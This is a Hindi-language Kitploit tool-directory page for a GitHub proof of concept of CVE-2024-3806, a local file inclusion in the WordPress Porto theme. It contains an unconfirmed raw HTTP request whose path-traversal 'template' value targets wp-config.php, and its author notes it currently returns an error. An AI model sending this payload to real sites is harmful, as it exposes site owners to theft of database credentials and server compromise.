Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-3806 — Porto <= 7.1.0 - porto_ajax_posts के माध्यम से अनधिकृत स्थानीय फ़ाइल समावेशन | Kitploit
उपकरण/GitHubGitHub/randomrobbiebf/cve-2024-3806
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubrandomrobbiebf/cve-2024-3806

CVE-2024-3806

Porto <= 7.1.0 - porto_ajax_posts के माध्यम से अनधिकृत स्थानीय फ़ाइल समावेशन

रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-3806

Porto <= 7.1.0 - अप्रमाणित स्थानीय फ़ाइल समावेशन porto_ajax_posts के माध्यम से

विवरण

WordPress के लिए Porto थीम 'porto_ajax_posts' फ़ंक्शन के माध्यम से सभी संस्करणों (7.1.0 तक और इसमें शामिल) में स्थानीय फ़ाइल समावेशन के लिए संवेदनशील है। यह अप्रमाणित हमलावरों को सर्वर पर मनमानी फ़ाइलों को शामिल करने और निष्पादित करने में सक्षम बनाता है, जिससे उन फ़ाइलों में किसी भी PHP कोड का निष्पादन संभव हो जाता है। इसका उपयोग पहुँच नियंत्रण को बायपास करने, संवेदनशील डेटा प्राप्त करने, या कोड निष्पादन प्राप्त करने के लिए किया जा सकता है जहाँ php फ़ाइल प्रकार अपलोड और शामिल किया जा सकता है।

अपुष्ट POC

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: kubernetes.docker.internal
Content-Type: application/x-www-form-urlencoded
Content-Length: 116

action=porto_ajax_posts&post_type=post&extra={"shortcode":"porto_posts_grid","template":"../../../../wp-config.php"}

नोट्स

अभी 500 त्रुटि मिल रही है।

टूल डाउनलोड करें